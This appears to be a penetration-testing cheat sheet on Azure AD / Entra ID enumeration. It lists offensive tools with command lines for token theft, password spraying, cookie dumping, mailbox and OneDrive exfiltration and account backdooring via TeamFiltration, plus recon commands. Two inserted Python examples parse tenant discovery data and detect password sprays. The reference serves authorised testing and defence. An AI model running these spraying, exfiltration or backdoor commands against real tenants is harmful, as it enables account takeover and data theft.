Azure AD - Enumerate
Azure AD - Collectors
- Microsoft Portals - Microsoft Administrator Sites
- dirkjanm/ROADTool - A collection of Azure AD tools for offensive and defensive security purposes
- BloodHoundAD/AzureHound - Azure Data Exporter for BloodHound
- BloodHoundAD/BARK - BloodHound Attack Research Kit
```powershell
# Load BARK, obtain a refresh token with username/password, exchange it for an MS Graph token, then pull all users
. .\BARK.ps1
$MyRefreshTokenRequest = Get-AZRefreshTokenWithUsernamePassword -username "user@contoso.onmicrosoft.com" -password "MyVeryCoolPassword" -TenantID "contoso.onmicrosoft.com"
$MyMSGraphToken = Get-MSGraphTokenWithRefreshToken -RefreshToken $MyRefreshTokenRequest.refresh_token -TenantID "contoso.onmicrosoft.com"
$MyAADUsers = Get-AllAzureADUsers -Token $MyMSGraphToken.access_token -ShowProgress
```
- dafthack/GraphRunner - A Post-exploitation Toolset for Interacting with the Microsoft Graph API
- NetSPI/MicroBurst - MicroBurst includes functions and scripts that support Azure Services discovery, weak configuration auditing, and post exploitation actions such as credential dumping
- hausec/PowerZure - PowerShell framework to assess Azure security
- silverhack/monkey365 - Microsoft 365, Azure subscriptions and Microsoft Entra ID security configuration reviews.
- prowler-cloud/prowler - Prowler is an Open Source Security tool for AWS, Azure, GCP and Kubernetes to do security assessments, audits, incident response, compliance, continuous monitoring, hardening and forensics readiness. Includes CIS, NIST 800, NIST CSF, CISA, FedRAMP, PCI-DSS, GDPR, HIPAA, FFIEC, SOC2, GXP, Well-Architected Security, ENS and more
- projectdiscovery/nuclei-templates - Community curated list of templates for the nuclei engine to find security vulnerabilities.
- nccgroup/ScoutSuite - Multi-Cloud Security Auditing Tool
- Flangvik/TeamFiltration - TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts
```powershell
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --cookie-dump C:\\CookieData.txt --all
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --aad
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --tokens C:\\OutputTokens.txt --onedrive --owa
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --teams --owa --owa-limit 5000
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --debug --exfil --onedrive
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --enum --validate-teams
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --enum --validate-msol --usernames C:\Clients\2021\FooBar\OSINT\Usernames.txt
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --backdoor
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --database
```
- Azure/StormSpotter - This repository has not been updated recently - Azure Red Team tool for graphing Azure and Azure Active Directory objects
- nccgroup/Azucar - This repository has been archived - Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks.
- FSecureLABS/Azurite - This repository has not been updated recently - Enumeration and reconnaissance activities in the Microsoft Azure Cloud.
- cyberark/SkyArk - This repository has not been updated recently - Discover the most privileged users in the scanned Azure environment - including the Azure Shadow Admins.
Azure AD - User Enumeration
Enumerate Tenant Information
- Federation with Azure AD or O365
- Get the Tenant ID
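Both checks above rely on two unauthenticated discovery documents published by Microsoft: `getuserrealm.srf?login=<user>&json=1` (federation type) and `/<domain>/.well-known/openid-configuration` (tenant ID in the issuer URL). The following is an added example, not code from the page or from any tool listed here, that parses constructed copies of both documents so a defender can confirm what their own domain exposes; the sample GUID and domains are made up.

```python
"""Parse the public Entra ID discovery documents for a domain: getuserrealm.srf
(federation type) and .well-known/openid-configuration (tenant ID). The sample
responses at the bottom are constructed, not captured from a real tenant."""
import json
import re
from typing import Optional
from urllib.request import urlopen  # only used by fetch_json(), not in the offline demo

GUID = re.compile(r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$")

def federation_type(realm_doc: str) -> dict:
    """NameSpaceType is Managed (cloud-only), Federated (ADFS/other IdP) or Unknown;
    AuthURL is only present for federated domains."""
    realm = json.loads(realm_doc)
    return {"domain": realm.get("DomainName"),
            "type": realm.get("NameSpaceType", "Unknown"),
            "auth_url": realm.get("AuthURL")}

def tenant_id(openid_doc: str) -> Optional[str]:
    """Extract the tenant GUID from the issuer (https://sts.windows.net/<guid>/);
    a domain with no tenant returns an error document, which yields None."""
    cfg = json.loads(openid_doc)
    if "error" in cfg:
        return None
    guid = cfg.get("issuer", "").rstrip("/").rsplit("/", 1)[-1].lower()
    return guid if GUID.match(guid) else None

def fetch_json(url: str) -> str:
    """Live lookup against the public discovery URLs, e.g.
    https://login.microsoftonline.com/getuserrealm.srf?login=user@example.com&json=1
    https://login.microsoftonline.com/example.com/.well-known/openid-configuration"""
    with urlopen(url, timeout=10) as resp:
        return resp.read().decode()

# Constructed sample responses (example.com, made-up GUID).
REALM_FEDERATED = json.dumps({"State": 3, "Login": "user@example.com", "NameSpaceType": "Federated",
    "DomainName": "example.com", "FederationBrandName": "Example Corp",
    "AuthURL": "https://adfs.example.com/adfs/ls/"})
REALM_MANAGED = json.dumps({"State": 4, "NameSpaceType": "Managed", "DomainName": "example.com"})
OPENID_OK = json.dumps({"issuer": "https://sts.windows.net/11111111-2222-3333-4444-555555555555/",
    "token_endpoint": "https://login.microsoftonline.com/11111111-2222-3333-4444-555555555555/oauth2/token"})
OPENID_ERR = json.dumps({"error": "invalid_tenant", "error_description": "Tenant 'nosuch.example' not found."})

if __name__ == "__main__":
    print(federation_type(REALM_FEDERATED), federation_type(REALM_MANAGED))
    print(tenant_id(OPENID_OK), tenant_id(OPENID_ERR))
```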
Enumerate from a Guest Account
```powershell
powerpwn recon --tenant {tenantId} --cache-path {path}
powerpwn dump --tenant {tenantId} --cache-path {path}
powerpwn gui --cache-path {path}
```
Enumerate Emails
By default, O365 has a lockout policy of 10 tries, and it will lock out an account for one (1) minute.
- Validate email
- Extract email lists with valid credentials: https://github.com/nyxgeek/o365recon
Password Spraying
The default lockout policy tolerates 10 failed attempts, then locks the account out for 60 seconds.
- dafthack/MSOLSpray
- 0xZDH/o365spray
- Flangvik/TeamFiltration
```powershell
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --sleep-min 120 --sleep-max 200 --push --shuffle-users --shuffle-regions
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --push-locked --months-only --exclude C:\Clients\2021\FooBar\Exclude_Emails.txt
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --passwords C:\Clients\2021\FooBar\Generic\Passwords.txt --time-window 13:00-22:00
```
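The lockout figures above also describe what a spray looks like in the sign-in log: one source IP failing against many accounts while never reaching 10 attempts on any single one. The following is an added detection example, not code from the page or the tools it lists; it runs over constructed Entra ID sign-in records (the `MIN_DISTINCT_USERS` and `WINDOW` values are assumptions to tune per tenant, and 50126 is the "invalid username or password" error code).

```python
"""Flag password-spray patterns in Entra ID sign-in records: one source IP
failing logons for many distinct accounts while staying under the 10-attempt
lockout threshold per account. All records below are constructed."""
import json
from collections import defaultdict
from datetime import datetime, timedelta

LOCKOUT_THRESHOLD = 10       # default lockout threshold stated on the page
MIN_DISTINCT_USERS = 5       # assumption: tune to the tenant's size
WINDOW = timedelta(hours=1)  # assumption: one-hour hunting window

def parse(line):
    rec = json.loads(line)
    return {"ts": datetime.fromisoformat(rec["createdDateTime"].replace("Z", "+00:00")),
            "user": rec["userPrincipalName"].lower(), "ip": rec["ipAddress"],
            "failed": rec["status"]["errorCode"] != 0}

def detect_spray(lines):
    """Return {ip: {"users": n, "max_per_user": m}} for IPs whose failures
    touch many accounts but never reach the lockout threshold on any one."""
    per_ip = defaultdict(lambda: defaultdict(list))   # ip -> user -> [timestamps]
    for e in map(parse, lines):
        if e["failed"]:
            per_ip[e["ip"]][e["user"]].append(e["ts"])
    hits = {}
    for ip, users in per_ip.items():
        start = min(ts for stamps in users.values() for ts in stamps)
        # count failures inside the WINDOW that opens at this IP's first failure
        counts = {u: sum(ts - start <= WINDOW for ts in stamps) for u, stamps in users.items()}
        counts = {u: c for u, c in counts.items() if c}
        if len(counts) >= MIN_DISTINCT_USERS and max(counts.values()) < LOCKOUT_THRESHOLD:
            hits[ip] = {"users": len(counts), "max_per_user": max(counts.values())}
    return hits

def _rec(ts, user, ip, code):   # constructed sign-in record; 50126 = bad password
    return json.dumps({"createdDateTime": ts, "userPrincipalName": user,
                       "ipAddress": ip, "status": {"errorCode": code}})

SAMPLE_LOG = (
    [_rec(f"2024-05-01T09:{m:02d}:00Z", f"user{i}@contoso.onmicrosoft.com", "203.0.113.10", 50126)
     for i in range(6) for m in (i, i + 30)]                    # spray: 6 accounts, 2 tries each
    + [_rec(f"2024-05-01T09:{m:02d}:00Z", "victim@contoso.onmicrosoft.com", "203.0.113.99", 50126)
       for m in range(12)]                                      # brute force: one account, lockout fires
    + [_rec("2024-05-01T09:05:00Z", "alice@contoso.onmicrosoft.com", "198.51.100.7", 50126),
       _rec("2024-05-01T09:06:00Z", "alice@contoso.onmicrosoft.com", "198.51.100.7", 0)]  # typo, then success
)

if __name__ == "__main__":
    print(detect_spray(SAMPLE_LOG))
```

Only the spraying IP is reported; the single-account brute force is left to the lockout policy and the legitimate typo never reaches the distinct-user threshold.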
Azure Services Enumeration
Enumerate Tenant Domains
Extract openly available information for the given tenant: aadinternals.com/osint
```powershell
Invoke-AADIntReconAsOutsider -DomainName <DOMAIN>
Invoke-AADIntReconAsOutsider -Domain "company.com" | Format-Table
Invoke-AADIntReconAsOutsider -UserName "user@company.com" | Format-Table
```
Enumerate Azure Subdomains
```powershell
PS> . C:\Tools\MicroBurst\Misc\InvokeEnumerateAzureSubDomains.ps1
PS> Invoke-EnumerateAzureSubDomains -Base <TENANT NAME> -Verbose

Subdomain                                   Service
---------                                   -------
<TENANT NAME>.mail.protection.outlook.com   Email
<TENANT NAME>.onmicrosoft.com               Microsoft Hosted Domain
```
Enumerate Services
Using the Az PowerShell module

```powershell
# Enumerate resources
PS Az> Get-AzResource

# List all VMs the user has access to
PS Az> Get-AzVM

# Get all webapps
PS Az> Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"}

# Get all function apps
PS Az> Get-AzFunctionApp

# List all storage accounts
PS Az> Get-AzStorageAccount

# List all keyvaults
PS Az> Get-AzKeyVault

# Get all application objects registered using the current tenant
PS AzureAD> Get-AzureADApplication -All $true

# Enumerate role assignments
PS Az> Get-AzRoleAssignment -Scope /subscriptions/<SUBSCRIPTION-ID>/resourceGroups/RESEARCH/providers/Microsoft.Compute/virtualMachines/<VM-NAME>
PS Az> Get-AzRoleAssignment -SignInName test@<TENANT NAME>.onmicrosoft.com

# Check AppID Alternative Names/Display Name
PS AzureAD> Get-AzureADServicePrincipal -All $True | ?{$_.AppId -eq "<APP-ID>"} | fl
```

Using az cli
Multi Factor Authentication
- dafthack/MFASweep - A tool for checking if MFA is enabled on multiple Microsoft Services
References
- Bypassing conditional access by faking device compliance - @DrAzureAD - September 06, 2020
- CARTP-cheatsheet - Azure AD cheatsheet for the CARTP course
- Attacking Azure/Azure AD and introducing Powerzure - SpecterOps - Ryan Hausknecht - Jan 28, 2020
- Training - Attacking and Defending Azure Lab - Altered Security
- Azure Config Review - Nuclei Templates v10.0.0 - Prince Chaddha - Sep 12, 2024